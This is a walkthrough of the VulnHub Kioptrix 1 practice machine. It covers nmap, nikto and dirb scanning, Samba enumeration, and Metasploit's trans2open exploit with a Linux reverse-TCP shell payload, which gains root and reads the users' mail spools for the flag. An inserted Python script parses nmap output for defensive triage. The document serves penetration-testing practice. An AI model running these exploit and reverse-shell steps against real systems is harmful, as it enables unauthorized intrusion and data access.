So today we will be doing the first machine of the Kioptrix series, which can be found on VulnHub. The challenge says “EMail”, so I guess the flag is in the email of one of the user accounts.

So to start off we run the netdiscover -r 192.168.0.0/24 command to find the machine on the local area network. But it doesn’t show anything, yet again. So I googled and came up with host discovery for nmap: nmap -sn 192.168.0.0/24. It seems to work fine, so we will use this for any new machines, since netdiscover always takes a while and it’s a gamble whether a machine shows up or not. The machine should be at the .131 address since we are .129 ourselves.

So let’s run a normal and an all-port nmap scan with the following two commands: nmap -sV -sC -vv 192.168.0.131 -oA nmap and nmap -sV -sC -p- 192.168.0.131 -oA nmap full. We use verbose on the first nmap scan so we can start any new enumeration techniques while the nmap scan is still running.

We see port 80 is open, so let’s run a nikto and dirb scan on it while nmap is still running. We used the following two commands: nikto -host http://192.168.0.131 -output nikto.txt and dirb http://192.168.0.131 -o dirb.txt.

While these are running we can have a look at the nmap results, nmap should be done.

# Nmap 7.80 scan initiated Thu Feb  6 06:38:32 2020 as: nmap -sV -sC -vv -oA nmap 192.168.0.131
Nmap scan report for 192.168.0.131
Host is up, received syn-ack (0.0013s latency).
Scanned at 2020-02-06 06:38:32 EST for 125s
Not shown: 994 closed ports
Reason: 994 conn-refused
PORT     STATE SERVICE     REASON  VERSION
22/tcp   open  ssh         syn-ack OpenSSH 2.9p2 (protocol 1.99)
--snip--
80/tcp   open  http        syn-ack Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: 
|   Supported Methods: GET HEAD OPTIONS TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     syn-ack 2 (RPC #100000)
139/tcp  open  netbios-ssn syn-ack Samba smbd (workgroup: TAMYGROUP)
443/tcp  open  ssl/https   syn-ack Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
--snip--
1024/tcp open  status      syn-ack 1 (RPC #100024)

Host script results:
|_clock-skew: 1h01m48s
| nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   KIOPTRIX<00>         Flags: <unique><active>
|   KIOPTRIX<03>         Flags: <unique><active>
|   KIOPTRIX<20>         Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   MYGROUP<00>          Flags: <group><active>
|   MYGROUP<1d>          Flags: <unique><active>
|   MYGROUP<1e>          Flags: <group><active>
--snip--

Our full port scan didn’t find any extra services. We got a couple of ports we can look at: 80, 111, 139, 443 and 1024. Seems like we have to either exploit port 139 netbios or the webserver on 80 or 443. Let’s have a look at port 111, since I’m still curious what this port is normally used for. Doesn’t seem like we can do anything with it again. Should really look into the service later on.
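The same scan output can be read from the defender's side. The following is an added example, not part of the original write-up: it parses the service table of an nmap normal-output file produced with -vv (so the REASON column is present, as above) and lists the exposure notes an administrator would act on. The triage rules and the function names are assumptions of this example.

```python
import re

# Constructed sample: service lines copied from the scan output on this page.
SAMPLE = """\
PORT     STATE SERVICE     REASON  VERSION
22/tcp   open  ssh         syn-ack OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        syn-ack Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|   Supported Methods: GET HEAD OPTIONS TRACE
|_  Potentially risky methods: TRACE
111/tcp  open  rpcbind     syn-ack 2 (RPC #100000)
139/tcp  open  netbios-ssn syn-ack Samba smbd (workgroup: TAMYGROUP)
"""

# port/proto, state "open", service name, reason column (-vv), then version text
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s+\S+\s*(.*)$")

def parse_services(text):
    """Return one dict per open port, with its NSE script lines attached."""
    services = []
    for line in text.splitlines():
        if line.startswith("Host script results"):
            break  # host-level scripts do not belong to a port
        m = PORT_LINE.match(line)
        if m:
            services.append({"port": int(m.group(1)), "proto": m.group(2),
                             "service": m.group(3), "version": m.group(4).strip(),
                             "scripts": []})
        elif line.startswith("|") and services:
            services[-1]["scripts"].append(line.lstrip("|_ ").strip())
    return services

def findings(services):
    """Triage rules (assumptions of this example, not an exhaustive policy)."""
    out = []
    for s in services:
        if s["service"] == "ssh" and "protocol 1.99" in s["version"]:
            out.append((s["port"], "SSH protocol 1 still accepted (1.99 banner)"))
        if any(x.startswith("Potentially risky methods") and "TRACE" in x
               for x in s["scripts"]):
            out.append((s["port"], "HTTP TRACE enabled"))
        if s["service"] in ("rpcbind", "netbios-ssn"):
            out.append((s["port"], f"{s['service']} reachable from the scan host"))
    return out

if __name__ == "__main__":
    for port, note in findings(parse_services(SAMPLE)):
        print(f"{port}/tcp: {note}")
```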

The nikto and dirb scans are done, let’s have a look at the results:

Seems like it gave us quite some false positives. The files //etc/hosts, the WordPress files and the possible backdoor are not found on the server. The /manual/ and /usage/ pages do exist. The usage page seems interesting to exploit:

While looking around, the /test.php file is also listed. But it isn’t interesting; it only shows the following. Probably php4 is used, but it doesn’t print the text. So it might as well not be php4, since it isn’t printing the contents.

<?php4
	print "TEST";
?>

At the bottom of the webpage we can find the following: Generated by Webalizer Version 2.01. Are there any exploits for this version? Let’s use searchsploit with the following command: searchsploit webalizer. Doesn’t seem like there are any.

While using the web I found https://www.cvedetails.com/cve/CVE-2002-0180/; seems like there is a vulnerability with code execution. But there is no exploit code available in searchsploit, so it might be a tough one to exploit.

On to the next port, 139. I’m trying to enumerate the SMB service on port 139 but I’m having some problems. Enum4linux gave me a couple of usernames but stopped running after a small bit. Let’s save the usernames to a txt file and then we can have a look at metasploit, which I normally don’t use but need to learn anyway.

Let’s keep it simple, we can format the usernames later if we need it. Let’s echo it to a txt file with the following command: echo "administrator, guest, krbtgt, domain admins, root, bin, none" > kioptrix/usernames.txt

Let’s start up metasploit with msfconsole and use the search smb command to see what we can do. At the bottom we see a bunch of exploits, but not much I want to do with that yet. If we scroll up we can see a bunch of scanners:

Let’s use a couple of these to see what we can find. Below are some results. You can just copy the path and then use the use command with the path after it, like use auxiliary/scanner/smb/smb_version. Then we can do show options to see the settings we have to set. We have to set the RHOST value, which can be done with the set command: set RHOST 192.168.0.131. Then we can use the run command to run it.

Seems like it is running Samba 2.2.1a. Are there any exploits for it? Let’s run searchsploit again, and we found some interesting exploits. Since we are using metasploit already, let’s try to find the one listed in there.

So the first exploit, trans2open, is for OSX. The system is running Red Hat from what the Apache main page said, so that is not it. The second exploit, nttrans, says in metasploit that it is a DoS (Denial of Service), which is not what we want.

The third exploit trans2open seems interesting, which is available for multiple versions.

Let’s use the number 1 for Linux, check the options like we did before, set the RHOST and then run.

Seems like the meterpreter session works but it dies instantly:

Maybe we have to use another payload? Let’s see what the exploit is using at the moment. We can see all the advanced options with show advanced options. It is running a meterpreter reverse tcp payload.

With the show payloads command we can see all the available payloads. Let’s use a normal reverse_tcp payload.

The use payload command in the screenshot above is wrong, we had to use set payload linux/x86/shell/reverse_tcp. Let’s check the options again, all good? I changed the LPORT to 8080, so let’s run it.

Looks like we got root access! But now we have to find the flag in an email or something? Let’s look around for a bit, and if we cannot find anything, let’s google 😉

So I checked in the home directories, in the root directory and could not find it, so I googled and emails are under /var/spool/mail. I catted the emails from the three users harold, john and root. And in root I found:

We completed the challenge, on to level 2 in the Kioptrix series.
